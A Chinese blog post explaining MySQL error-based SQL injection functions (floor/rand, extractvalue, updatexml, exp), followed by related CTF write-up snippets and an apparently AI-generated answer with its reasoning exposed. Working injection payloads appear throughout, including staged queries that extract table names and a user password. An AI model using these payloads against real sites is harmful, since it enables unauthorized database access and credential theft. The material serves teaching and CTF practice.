报错注入常见函数原理

最新推荐文章于 2024-11-18 10:04:50 发布
最新推荐文章于 2024-11-18 10:04:50 发布
阅读量765 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: 字符串 mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/109491771

floor函数

select count(*),(floor(rand(0)*2))x from table group by x;

select查询语句
group by进行分组(相同为一组)
rand()生成0到1的随机数
floor()返回整数
count()对数据整合(类似去重)

产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。

参考:http://www.cnblogs.com/sfriend/p/11365999.html

extractvalue函数

限制长度为32位

and extractvalue(1,concat(0x7e,(select user()),0x7e));

该参数接受两个字符串参数,一个xml标记片段和一个xpath表达式,而第二参数要求xpath格式字符串,而我们不是所以报错。

参考:https://www.cnblogs.com/xishaonian/p/6250444.html

updatexml函数

限制长度为32位

and updatexml(1,concat(0x7e,(select user()),0x7e),1)

updatexml(1,2,3)第一个参数是string格式,为xml文档对象的名称,第二个参数为xpath格式的字符串,第三个string格式,替换查找到的符合条件的数据,由于第二个参数要xpath格式的字符串,因为不符合规则所以报错。

参考:http://blog.csdn.net/qq_37873738/article/details/88042610

name_const函数

只可获取数据库的版本信息

exp函数

exp(~(select * from(select user())a))

exp(int)该函数会返回值得x次方结果,当值超过mysql的范围就会爆错,上面payload的意思为:先查询user()的数据取名为a再select * from a将结果集a全部查询出来。

报错函数:
floor()
extractvalue()
updatexml()
name_const()
join()
exp()
geometry collection()
polygon()
multipoint()
multlinestring()
multpolygon()
linestring()
参考:http://www.mamicode.com/info-detail-2366760.html
《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 1万+
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入使用步骤。
【漏洞挖掘】——116、GeometryCollection报错注入
Fly_鹏程万里
06-25 168
本篇文章我们主要对报错注入原理进行了介绍,同时对报错注入的几种常见方式、函数,手工注入语句进行了演示介绍~其余的依次变量limit x,y中的x的值来获取表名信息即可~其余的依次变量limit x,y中的x的值来获取表名信息即可~
CTFHub 技能树 之 SQL注入
滚滚是只小狐狸
03-05 1168
标题CTFHub 技能树 之SQL注入 进入CTFHub官网 一:SQL整数型注入 开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用 工具注入也可以使用手工注入。 手工注入可以看一下这个博主写的查看手工注入 如果想了解工具的话就继续往下看吧☺ 我使用的是 kali 自带的 sqlmap 工具 1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数...
CTFHub_技能树_Web之SQL注入——报错注入详细原理讲解(含三种解法原理讲解)
Ho1aAs‘s Blog
12-20 1171
文章目录一、报错注入原理报错注入常用函数floor()extractvalue()、updatexml()原理二、注入过程Ⅰ、使用floor()1.查询表名2.查询列名3.查值Ⅱ、使用extractvalue()1.查询表名2.查询列名3.查值Ⅲ、使用updatexml()1.查询表名2.查询列名3.查值 一、报错注入原理 报错注入,通过运行SQL查询语句,回显查询结果。由于某些函数的神奇操作会使得传入参数先运行,而被报错抛出,能够直接查看参数的运行情况,因而实现查询。 报错注入常用函数 《代码审计:企业
CTFHUB技能树之SQL——报错注入
weixin_73049307的博客
10-16 992
显示出'1''和报错信息,说明没有闭合情况,是报错注入且是整数型注入。正常显示报错信息,确定报错函数updatexml()可以使用。没有回显出相关信息,初步判断是报错注入、时间盲注或布尔盲注。得到表名是news和flag,其中flag表是我们要找的。说明数据库名是sqli。一样成功得到flag。
CTFHub技能树--sql注入报错注入步骤详解
wqatss的博客
11-18 950
这篇主要是sql注入--报错注入步骤详解,很详细
CTFHub技能树web(持续更新)--SQL注入--报错注入
jiuyongpinyin的博客
08-14 614
报错注入 首先题目提示是报错注入,我们先尝试and 1=1 万能测试句: 发现是存在注入的,接着我们报错数据库: ?id=1 and updatexml(1,concat('~',database()),1) --+ 报错出当前数据库是sqli,接着我们报错出列: ?id=1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='s
sql注入-报错注入
爆金币了,老登!
07-09 655
针对于dvwa靶场的sql报错注入
sql注入报错注入
m0_63436163的博客
08-27 1400
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
MySQL报错注入函数汇总
Au
06-12 5498
常用函数 字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空 concat(str1, str2, str3 ,...) concat_ws('指定分隔符', str1,str2,str3...) 开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体才返回空 group_concat...
【ctfhub】SQL注入报错注入
manerzi的博客
10-08 360
SQL注入报错注入
CTFHUB-SQL注入-报错注入
weixin_68416970的博客
06-10 630
报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。
CTFhub 报错注入
plant1234的博客
06-16 300
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
CTFHub 技能树之报错注入
qq_47271638的博客
05-28 650
首先测试注入点 and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试 发现没有回显初步判断可能是报错注入或者是时间盲注或者布尔盲注; 假设为报错注入. 查询数据库 构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)– 得到数据库名:sqli 查询数据表 构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 597
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
CTFHub技能树 Web-SQL注入 详解
weixin_45808483的博客
11-16 6103
整数型注入 我们输入 1 不断尝试发现闭合方式就是 1 ,整数型 存在两列 order by 2 存在两个注入点 /?id=-1 union select 8,9 爆库,当前数据库为sqli /?id=-1 union select 8,database() 爆出所有表名,这里我们需要吧sqli转换为16进制 /?id=-1 union select 8,group_concat(table_name) from infromation_schema...
CTFHub:web前置技能-SQL注入-报错注入
wdnmddbl的博客
06-13 1140
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。sql注入基本语句基于报错的SQL盲注 - 报错回显(强制性报错 )updatexml():从目标XML中更改包含所查询值的字符串
CTFHub笔记之技能树-web:报错注入
weixin_48799157的博客
03-19 483
小白一个,如有错误请指正! 对这方面不是很熟悉,补了一下知识点: https://blog.csdn.net/silence1_/article/details/90812612https://blog.csdn.net/silence1_/article/details/90812612 解法一: 1.用extractvalue()函数数据库 select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 842
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 题目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
SQL注入报错函数
最新发布
04-22
<think>好的,我现在需要帮助用户查找关于SQL注入报错函数使用方法和示例。用户已经提供了一些引用内容,我需要结合这些引用来组织回答。 首先,用户提到了四个引用,其中引用1到4都涉及报错注入的不同方面。引用1解释了报错注入的基本原理,引用2和3提到了使用count()和floor()函数的例子,引用4讨论了updatexml和extractvalue函数使用。用户的上一次问题涉及时间盲注,现在转向报错注入,可能是在学习不同类型的注入方法。 我需要确保回答结构清晰,分点说明每个报错函数使用方法,并给出示例。同时,用户需要中文回答,所以要注意用词准确。根据用户提供的引用,报错函数包括floor()+rand()、updatexml、extractvalue等,可能还需要补充其他常见函数如exp()。 接下来,我需要检查每个函数原理、语法、示例payload,以及注意事项。比如,floor(rand()*2)在group by时导致主键冲突,从而引发报错,这个在引用2和3中提到过。updatexml和extractvalue则是利用XPath语法错误来触发报错,这在引用4中有说明。 还要考虑不同数据库的兼容性,比如MySQL和SQL Server是否有不同的函数。用户提供的示例主要是MySQL,所以重点放在MySQL上。此外,需要提到防御措施,帮助用户了解如何防范这类攻击,比如参数化查询和错误信息处理。 用户可能还想知道如何自动化利用这些函数,比如使用sqlmap工具,但问题主要集中在手动使用方法上。因此,示例需要具体,比如如何获取数据库名、表名、字段名,每一步的payload如何构造。 最后,确保回答中的引用标记正确,例如引用[^1]、[^2]等,但根据用户提供的引用内容,可能需要调整引用编号,但用户示例中的引用是[^1]、[^2]、[^3]、[^4],所以保持原样。 总结回答结构: 1. 报错注入原理 2. 常用函数及示例(floor+rand、updatexml、extractvalue、exp) 3. 防御措施 4. 相关问题 需要确保每个函数都有详细的payload示例和解释,并注明对应的引用来源。同时,检查是否有遗漏的函数或方法,如geometrycollection等,但可能用户提供的引用中没有提到,可以暂时不提,或者简要提及。 现在开始组织内容,确保每个部分清晰,使用代码块和表格来展示示例,保持格式正确。</think>#### SQL注入报错函数使用方法详解 --- ### 一、报错注入核心原理 通过构造**特定SQL语句触发数据库报错**,将查询结果直接嵌入错误信息中返回[^1]。核心条件: 1. 应用程序未过滤错误信息(如开启`mysql_error()`输出) 2. 攻击者可控制输入参数 --- ### 二、常用报错函数及Payload示例 #### 1. `floor(rand()*2)` + `GROUP BY`(主键冲突) - **原理**:利用`GROUP BY`分组时产生的临时表主键冲突报错 - **典型Payload**: ```sql id=1' AND (SELECT COUNT(*), CONCAT((SELECT DATABASE()), 0x7e, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x)-- ``` - 输出示例:`Duplicate entry 'database_name~1' for key 'group_key'`[^2] - **应用场景**: - 获取数据库名、表名、字段名 - 逐字符提取数据(配合`SUBSTRING`函数) #### 2. `updatexml()`(XPath语法错误) - **函数语法**: ```sql UPDATEXML(XML_document, XPath_string, new_value) ``` - **Payload构造**: ```sql id=1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT USER()), 0x7e), 1)-- ``` - 输出示例:`XPATH syntax error: '~root@localhost~'`[^4] - **限制**: - 单次最大输出长度32字符(需配合`SUBSTRING`分段获取) - 仅适用于MySQL 5.1.5+版本 #### 3. `extractvalue()`(XPath语法错误) - **函数语法**: ```sql EXTRACTVALUE(XML_document, XPath_string) ``` - **Payload示例**: ```sql id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e))-- ``` - 输出示例:`XPATH syntax error: '~5.7.36-log~'`[^4] #### 4. `exp()`(数值溢出报错) - **原理**:通过指数函数触发数值溢出错误 - **Payload示例**: ```sql id=1' AND EXP(~(SELECT * FROM (SELECT USER())a))-- ``` - 输出示例:`DOUBLE value is out of range` --- ### 三、分阶段数据提取示例 #### 1. 获取数据库名 ```sql id=1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT DATABASE()), 0x7e), 1)-- ``` #### 2. 提取表名 ```sql id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))-- ``` #### 3. 读取字段值 ```sql id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT password FROM users LIMIT 0,1), FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)-- ``` --- ### 四、防御措施 1. **禁用错误回显**:生产环境关闭`mysql_error()`输出[^4] 2. **参数化查询**: ```python cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,)) ``` 3. **函数黑名单**:过滤`updatexml`、`extractvalue`等关键词 4. **权限控制**:数据库账户仅授予最小必要权限 --- ### 五、工具辅助 使用`sqlmap`自动化注入(指定报错技术): ```bash sqlmap -u "http://example.com?id=1" --technique=E ``` 参数说明:`--technique=E` 表示使用报错注入技术 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值